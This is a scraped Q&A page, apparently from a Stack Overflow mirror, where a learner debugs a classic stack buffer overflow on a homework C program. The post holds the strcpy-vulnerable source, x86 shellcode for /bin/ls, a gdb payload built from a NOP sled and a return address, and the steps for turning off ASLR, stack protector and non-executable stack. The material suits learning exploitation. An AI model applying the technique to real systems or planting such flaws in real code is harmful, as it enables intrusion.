Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Homework - Cannot exploit bufferoverflow

I am trying to learn to exploit simple bufferover flow technique on Backtrack Linux.

Here is my C program

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];
    if(argc==2)
    {

    strcpy(buffer, argv[1]);  //vulnerable function

    }

    return 0;
}

This is the shellcode I am using, which corresponds to simple /bin/ls \x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80

I inject this shellcode in gdb using following command

run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')

As I step through the application, it generates SIG FAULT on final ret instruction. At that point EIP is correctly set to 0xffffd30c. This address is addressable and contains series of NOP, followed by my shell code as shown in the payload.

I have disabled the ASLR sudo echo 0 > /proc/sys/kernel/randomize_va_space

and also compiled my binary using fno-stack-protector option.

Any idea what's the cause of SIGSEGV ?

like image 741
Madhur Ahuja Avatar asked Aug 06 '11 04:08

Madhur Ahuja


1 Answers

I have answered my own question, the problem was "Executable Stack Protection", where in stack memory cannot be executed. This can be disabled in gcc as follows

gcc -z execstack

like image 138
Madhur Ahuja Avatar answered Sep 27 '22 21:09

Madhur Ahuja